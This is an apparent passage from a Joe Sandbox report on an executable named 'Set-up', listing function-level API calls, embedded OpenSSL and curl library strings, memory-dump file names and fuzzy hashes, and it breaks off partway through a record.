                            • Opcode Fuzzy Hash: 78c3099fcd9ce29fe96d6f5d6230235e90eb91a3b40f1a46566e438b7b6d0cd4
                            • Instruction Fuzzy Hash: D0529471A087818FDB11CF29C845BABB7E5AFD9384F044A2DF9C893252E774D944CB92
                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 009DE28D
                            • FindNextFileW.KERNEL32(?,00000000), ref: 009DE2BB
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 009DE30A
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 009DE3C7
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 009DE3DD
                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 009DE3F8
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 009DE41A
                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 009DE44E
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 009DE563
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 009DE571
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                            • String ID:
                            • API String ID: 1393009926-0
                            • Opcode ID: f35cc3c33ec6da3c2a78718ec4f34917e73fa06c3978afa1ccb6fb3120014494
                            • Instruction ID: 720084541452d3a39663b253d5c838a828062028605cd24c4ca3da066f3191f5
                            • Opcode Fuzzy Hash: f35cc3c33ec6da3c2a78718ec4f34917e73fa06c3978afa1ccb6fb3120014494
                            • Instruction Fuzzy Hash: 23913634240B429FD721AF34CC84B76BBA5EF85314F1886AAF9658F3A1E730E945CB50
                            APIs
                            • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 008BCC95
                              • Part of subcall function 008BCDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 008BCEC8
                              • Part of subcall function 008BCDF0: SetLastError.KERNEL32(00000002,00000000,008BCC27,00000004), ref: 008BD109
                            • SetLastError.KERNEL32(00000002), ref: 008BCDD0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLastmemchr
                            • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                            • API String ID: 2208448350-3285806060
                            • Opcode ID: 912aa97e1d007162ace6e191cb029b6e5ad561df65ec7ecc12b75efd67ff29be
                            • Instruction ID: 8926664eb7d8c13c83c55456a969ea1273150f95c63cd64724a05c1b0bbf0218
                            • Opcode Fuzzy Hash: 912aa97e1d007162ace6e191cb029b6e5ad561df65ec7ecc12b75efd67ff29be
                            • Instruction Fuzzy Hash: 9AD10676A083058BD7249E28D8913AFBBD1FF91354F18493DE8D9D7381EB709948D782
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
                            • API String ID: 0-2568808753
                            • Opcode ID: e541f0e8e6a86d7a01136a9b8a3036d783cd950a2336a02445d1a85325fd51b7
                            • Instruction ID: fffa0c908c7292d65353b10bfe1ce2e3148dd7b0c795e8a7e8bca0b6697a451e
                            • Opcode Fuzzy Hash: e541f0e8e6a86d7a01136a9b8a3036d783cd950a2336a02445d1a85325fd51b7
                            • Instruction Fuzzy Hash: 15E1B273608305EFD720AF54D841B6FB7E5AFC4744F05882CF98DA7292E7B5A9048B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                            • API String ID: 0-2555271450
                            • Opcode ID: 62dee92ce9122618026496bfd56b60587f2c01af873a31d11aab067225f442d4
                            • Instruction ID: 224fb0383155c3c33107833df66b68b629c7ca0f4d9b81b6319ac109c12e590e
                            • Opcode Fuzzy Hash: 62dee92ce9122618026496bfd56b60587f2c01af873a31d11aab067225f442d4
                            • Instruction Fuzzy Hash: 32C269316083458FD758CE28C89076AB7E2FFD9364F158A2DE899DB391D730ED458B82
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00B706A3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: $
                            • API String ID: 3510742995-227171996
                            • Opcode ID: 44deb2483392ea3240a2b573495a694ae3490894de3ab004d45ccbe08d4d7647
                            • Instruction ID: 34edd6ecf65bfae36901452fd64a876c68e583125a7102743e85da0d7c479f9d
                            • Opcode Fuzzy Hash: 44deb2483392ea3240a2b573495a694ae3490894de3ab004d45ccbe08d4d7647
                            • Instruction Fuzzy Hash: 8AD2AF72A187158FC724DF2CC88026AF7E1EFC4304F198A6EE9A997351D770E945CB92
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00A48A66
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00A48A88
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00A48B45
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00A48B59
                            Strings
                            • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00A48A42, 00A48F13
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                            • API String ID: 1297977491-3184136495
                            • Opcode ID: b3453364223a60793b452a546651b9969ddf000797f443ab48d2818fbe9257dc
                            • Instruction ID: a384b32fa94781134f35ffdbf17595d55419a9a7b4978307476771de7922c9b3
                            • Opcode Fuzzy Hash: b3453364223a60793b452a546651b9969ddf000797f443ab48d2818fbe9257dc
                            • Instruction Fuzzy Hash: FE221F769087419FD701DF24D881BABB7E0BFD6344F088A1DF89597282EB34E944CB92
                            APIs
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00B847A3
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B847C1
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B84800
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B84D16
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _strdupmemcpystrchrstrlen
                            • String ID: H$xn--
                            • API String ID: 1602650251-4022323365
                            • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                            • Instruction ID: e54cbed764593478324e0646d371fcb77e80c6aad32b5162455b2313903793cb
                            • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                            • Instruction Fuzzy Hash: 8EE138316087168FD718EE28D8C072AB7D2EBD4314F198ABDE996873A1E774DC05C742
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B0C090
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 00B0C0BE
                            Strings
                            • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 00B0C433
                            • crypto/evp/encode.c, xrefs: 00B0C42E
                            • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 00B0C0D2, 00B0C266
                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00B0C0CD, 00B0C26B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                            • API String ID: 3510742995-2458911571
                            • Opcode ID: a38336e28f24b565dfe42402475c94e229fbbc2d108d1e5db5ec93eea459272e
                            • Instruction ID: 116d18d196840d6b88d755bbd591011fe0c60e486654dd6ef9f82832b9831810
                            • Opcode Fuzzy Hash: a38336e28f24b565dfe42402475c94e229fbbc2d108d1e5db5ec93eea459272e
                            • Instruction Fuzzy Hash: 63C1E67560C3958FC7159F28C49062ABFE1EF9A304F098AADE8D58B382D335E905CB52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$ssl/quic/quic_txp.c
                            • API String ID: 0-600063881
                            • Opcode ID: a0ef4750f0535282eb3a37b0a0b4e8711c2f7d66a8eba85de4731caae7ebced4
                            • Instruction ID: 1769327d855cf6fac8052c0aa4e369aa316255f1009093e186c9117733f02318
                            • Opcode Fuzzy Hash: a0ef4750f0535282eb3a37b0a0b4e8711c2f7d66a8eba85de4731caae7ebced4
                            • Instruction Fuzzy Hash: C053D271A087419FD724CF28C880BABB7E5BFC5314F15892DE8998B391E775E944CB82
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: default$login$macdef$machine$netrc.c$password
                            • API String ID: 0-1043775505
                            • Opcode ID: 1828b86f9be6a0a1ca4c7d8094b007cc187483b5e87f39a18c7361d5d605e885
                            • Instruction ID: e08fc5b4e144d51a9f28df797a393af7f314c10af94da068d4f55d03d8c928bd
                            • Opcode Fuzzy Hash: 1828b86f9be6a0a1ca4c7d8094b007cc187483b5e87f39a18c7361d5d605e885
                            • Instruction Fuzzy Hash: DCE1F2709083859BE3218E24D98676BBBD4FF95708F19082CF885D7382F7B599688793
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: BQ`
                            • API String ID: 0-1649249777
                            • Opcode ID: 29eb982b273fd2cfa90a3d1341cdf9a2583fb26e655bcce34cce8a734e72694e
                            • Instruction ID: 7589b1a0bcaaebdaebe58fa8a08f419657ba786a5b480a335420d486310e1982
                            • Opcode Fuzzy Hash: 29eb982b273fd2cfa90a3d1341cdf9a2583fb26e655bcce34cce8a734e72694e
                            • Instruction Fuzzy Hash: 5DA2CF71A08B169FC718CF29C490769F7E1FF88316F1586ADD9A987781D334E8A5CB80
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,009F2212,00000000,00000000), ref: 00970109
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
